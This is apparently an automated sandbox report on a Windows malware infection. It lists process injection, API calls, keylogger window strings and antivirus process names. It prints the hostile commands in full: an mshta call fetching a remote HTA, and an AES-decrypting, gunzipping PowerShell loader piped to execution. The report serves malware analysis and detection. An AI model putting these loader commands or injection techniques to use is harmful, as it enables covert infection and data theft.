Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 25_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 25_2_0040E61C
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 25_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 25_2_00416F6A
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 25_2_004123F1 SetUnhandledExceptionFilter, 25_2_004123F1
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Roaming\uc.exe Memory allocated: C:\Users\Public\Libraries\bwsiuvcU.pif base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\uc.exe Memory allocated: C:\Users\Public\Libraries\bwsiuvcU.pif base: 1E090000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF Memory allocated: C:\Users\Public\Libraries\bwsiuvcU.pif base: 400000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF Memory allocated: C:\Users\Public\Libraries\bwsiuvcU.pif base: 121D0000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF Memory allocated: C:\Users\Public\Libraries\bwsiuvcU.pif base: 400000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF Memory allocated: C:\Users\Public\Libraries\bwsiuvcU.pif base: 1E090000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\uc.exe Section unmapped: C:\Users\Public\Libraries\bwsiuvcU.pif base address: 400000
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF Section unmapped: C:\Users\Public\Libraries\bwsiuvcU.pif base address: 400000
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF Section unmapped: C:\Users\Public\Libraries\bwsiuvcU.pif base address: 400000
Source: C:\Users\user\AppData\Roaming\uc.exe Memory written: C:\Users\Public\Libraries\bwsiuvcU.pif base: 2A5008
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF Memory written: C:\Users\Public\Libraries\bwsiuvcU.pif base: 211008
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF Memory written: C:\Users\Public\Libraries\bwsiuvcU.pif base: 239008
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://www.sessosesso.it/assets/aw/yt.hta
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $OsFNkdw = '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';$JIfveZK = 'cFRkUGZlWWl4R2ZHdlp1WlRocFlZR3RFVUtmamhETUc=';$UGIWRBAh = New-Object 'System.Security.Cryptography.AesManaged';$UGIWRBAh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$UGIWRBAh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$UGIWRBAh.BlockSize = 128;$UGIWRBAh.KeySize = 256;$UGIWRBAh.Key = [System.Convert]::FromBase64String($JIfveZK);$VpSlE = [System.Convert]::FromBase64String($OsFNkdw);$uBmStTPL = $VpSlE[0..15];$UGIWRBAh.IV = $uBmStTPL;$cLYZAvcnc = $UGIWRBAh.CreateDecryptor();$eVtPpVFwq = $cLYZAvcnc.TransformFinalBlock($VpSlE, 16, $VpSlE.Length - 16);$UGIWRBAh.Dispose();$DaRjcu = New-Object System.IO.MemoryStream( , $eVtPpVFwq );$wDjFzJY = New-Object System.IO.MemoryStream;$MtMSBjEhy = New-Object System.IO.Compression.GzipStream $DaRjcu, ([IO.Compression.CompressionMode]::Decompress);$MtMSBjEhy.CopyTo( $wDjFzJY );$MtMSBjEhy.Close();$DaRjcu.Close();[byte[]] $dVtmfGSE = $wDjFzJY.ToArray();$ghWDGW = [System.Text.Encoding]::UTF8.GetString($dVtmfGSE);$ghWDGW | powershell -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\uc.exe "C:\Users\user\AppData\Roaming\uc.exe"
Source: C:\Users\user\AppData\Roaming\uc.exe Process created: C:\Users\Public\Libraries\bwsiuvcU.pif C:\Users\Public\Libraries\bwsiuvcU.pif
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF Process created: C:\Users\Public\Libraries\bwsiuvcU.pif C:\Users\Public\Libraries\bwsiuvcU.pif
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF Process created: C:\Users\Public\Libraries\bwsiuvcU.pif C:\Users\Public\Libraries\bwsiuvcU.pif
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop $osfnkdw = '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';$jifvezk = 'cfrkugzlwwl4r2zhdlp1wlrocflzr3rfvutmamhetuc=';$ugiwrbah = new-object 'system.security.cryptography.aesmanaged';$ugiwrbah.mode = [system.security.cryptography.ciphermode]::ecb;$ugiwrbah.padding = [system.security.cryptography.paddingmode]::zeros;$ugiwrbah.blocksize = 128;$ugiwrbah.keysize = 256;$ugiwrbah.key = [system.convert]::frombase64string($jifvezk);$vpsle = [system.convert]::frombase64string($osfnkdw);$ubmsttpl = $vpsle[0..15];$ugiwrbah.iv = $ubmsttpl;$clyzavcnc = $ugiwrbah.createdecryptor();$evtppvfwq = $clyzavcnc.transformfinalblock($vpsle, 16, $vpsle.length - 16);$ugiwrbah.dispose();$darjcu = new-object system.io.memorystream( , $evtppvfwq );$wdjfzjy = new-object system.io.memorystream;$mtmsbjehy = new-object system.io.compression.gzipstream $darjcu, ([io.compression.compressionmode]::decompress);$mtmsbjehy.copyto( $wdjfzjy );$mtmsbjehy.close();$darjcu.close();[byte[]] $dvtmfgse = $wdjfzjy.toarray();$ghwdgw = [system.text.encoding]::utf8.getstring($dvtmfgse);$ghwdgw | powershell -
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop $osfnkdw = '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';$jifvezk = 'cfrkugzlwwl4r2zhdlp1wlrocflzr3rfvutmamhetuc=';$ugiwrbah = new-object 'system.security.cryptography.aesmanaged';$ugiwrbah.mode = [system.security.cryptography.ciphermode]::ecb;$ugiwrbah.padding = [system.security.cryptography.paddingmode]::zeros;$ugiwrbah.blocksize = 128;$ugiwrbah.keysize = 256;$ugiwrbah.key = [system.convert]::frombase64string($jifvezk);$vpsle = [system.convert]::frombase64string($osfnkdw);$ubmsttpl = $vpsle[0..15];$ugiwrbah.iv = $ubmsttpl;$clyzavcnc = $ugiwrbah.createdecryptor();$evtppvfwq = $clyzavcnc.transformfinalblock($vpsle, 16, $vpsle.length - 16);$ugiwrbah.dispose();$darjcu = new-object system.io.memorystream( , $evtppvfwq );$wdjfzjy = new-object system.io.memorystream;$mtmsbjehy = new-object system.io.compression.gzipstream $darjcu, ([io.compression.compressionmode]::decompress);$mtmsbjehy.copyto( $wdjfzjy );$mtmsbjehy.close();$darjcu.close();[byte[]] $dvtmfgse = $wdjfzjy.toarray();$ghwdgw = [system.text.encoding]::utf8.getstring($dvtmfgse);$ghwdgw | powershell -
Source: bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE6A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR
Source: bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE6A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE6A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: q8<b>[ Program Manager]</b> (24/04/2024 13:36:37)<br>{Win}TH
Source: bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE6A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: q9<b>[ Program Manager]</b> (24/04/2024 13:36:37)<br>{Win}rTH
Source: bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE6A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Managert-
Source: bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE6A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: q3<b>[ Program Manager]</b> (24/04/2024 13:36:37)<br>
Source: C:\Users\user\AppData\Roaming\uc.exe Code function: InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,ExitProcess, 19_2_0299D5D0
Source: C:\Users\user\AppData\Roaming\uc.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 19_2_02985A90
Source: C:\Users\user\AppData\Roaming\uc.exe Code function: GetLocaleInfoA, 19_2_0298A780
Source: C:\Users\user\AppData\Roaming\uc.exe Code function: GetLocaleInfoA, 19_2_0298A7CC
Source: C:\Users\user\AppData\Roaming\uc.exe Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 19_2_02985B9C
Source: C:\Users\user\AppData\Roaming\uc.exe Code function: InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,ExitProcess, 19_2_0299D5D0
Source: C:\Users\user\AppData\Roaming\uc.exe Code function: GetCurrentProcess,EnumSystemLocalesA,ExitProcess, 19_2_029A5FA0
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: GetLocaleInfoA, 23_2_00417A20
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: GetLocaleInfoA, 23_1_00417A20
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF Code function: WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,ExitProcess, 24_2_028BD5D0
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 24_2_028A5A90
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF Code function: GetLocaleInfoA, 24_2_028AA7CC
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 24_2_028A5B9B
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF Code function: GetCurrentProcess,EnumSystemLocalesA,ExitProcess, 24_2_028C5F9F
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: GetLocaleInfoA, 25_2_00417A20
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_029891C8 GetLocalTime, 19_2_029891C8
Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_0298B748 GetVersionExA, 19_2_0298B748
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: cmdagent.exe
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: quhlpsvc.exe
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgamsvr.exe
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: TMBMSRV.exe
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Vsserv.exe
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgupsvc.exe
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgemc.exe
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

